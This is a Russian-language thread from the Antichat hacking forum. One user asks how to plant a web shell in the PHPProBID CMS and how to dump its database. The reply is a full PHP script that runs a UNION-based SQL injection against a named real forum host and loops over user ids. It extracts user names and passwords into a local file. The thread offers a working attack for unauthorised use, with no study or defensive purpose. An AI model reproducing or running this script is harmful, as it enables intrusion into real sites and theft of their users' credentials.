Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   PHPProBID (https://forum.antichat.xyz/showthread.php?t=192017)

Gerceg 31.03.2010 10:32
PHPProBID
 
Парни подскажите как в эту CMS залить шелл.Актуально версия 5.25.Или как в админке можно сдампить всю БД.Вроде рылся и ни че не нашел.
И еще вопрос.
Парни скажите ка ксдампить полностью БД.

longer 31.03.2010 19:06
Цитата:
Сообщение от Gerceg
Парни подскажите как в эту CMS залить шелл.Актуально версия 5.25.Или как в админке можно сдампить всю БД.Вроде рылся и ни че не нашел.
И еще вопрос.
Парни скажите ка ксдампить полностью БД.


<?
/*************************************************
* 15.02.2007 22:00-23:12 *
* супер пупер скрипт для вытаскивания баз *
* *
* *
* (c)одед бай cRiLaZ *
* (GraBBerZ TeaM) *
* *
* Приват в МИР!!!!!!!!! *
* протева закрытых сорцов ;) *
************************************************/
/*конфиг*/
$host="forum.tomsk.ru"; #хост
$how_much=4; # скока раз повторять цикл
/*функция, пишущая в файл sql.txt*/
function input_into($text)
{
$a_file=fopen("./sql.txt","a+");
fputs($a_file,"$text");
fclose($a_file);
}
/*собсно цикл*/
for($q=1;$q<=$how_much;$q++)
{
/*сдесь все, что после хоста*/
$string_query="forum.php?a=24&user_id=-1+UNION+SELECT+1,CONCAT(CHAR(45,45,45),user_name,C HAR(45,45),user_pass,CHAR(45,45,45)),null,null,nul l,null,null,null,null,null+FROM+forum_user+WHERE+i d=$q/* HTTP/1.0\n\n";
/*формируем запрос к серву, в разных скулях тут по разному нада поставить*/
$request ="GET http://".$host."/".$string_query." HTTP/1.1\n";
$request.="Host: ".$host."\n";
$request.="User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$request.="Connection: keep-alive\n";
/*открываем сокет*/
$soket=fsockopen($host,80,$errno,$errstr,13); #13 )))
fwrite($soket,$request); #пишем в сокет
while(!feof($soket)){ #
$content.=fgets($soket);}#читаем
fclose($soket); #закрываем
/*регулярка*/
ereg("(---(.*)---)",$content,$infa);
/*пишем в файл результаты*/
input_into("$q)".$infa[0]."\n");
/*обнуляем все, ваще то нада тока контент, но мы же примерные*/
$content="";
$params="";
$request="";
}

/*************************************************
* а это для тех, кто в доспехах ;)
* в общем регулярка думаю все понятно
* "---" - это начало и конец строки,
* "(.*)" - это любые значения.
* Т.е. в массив будет попадать все следующего вида
* "---login:pwd:mail---", если канешна в пассе, логине и т.д. нету "---".
* Ну наверно все, скуль для испытаний я взял у [sql].
* Просьба нащет орфографии не че не писать!!!
* Пешу так спициальна по своим соображениям! ;)
************************************************/
?>


Время: 17:23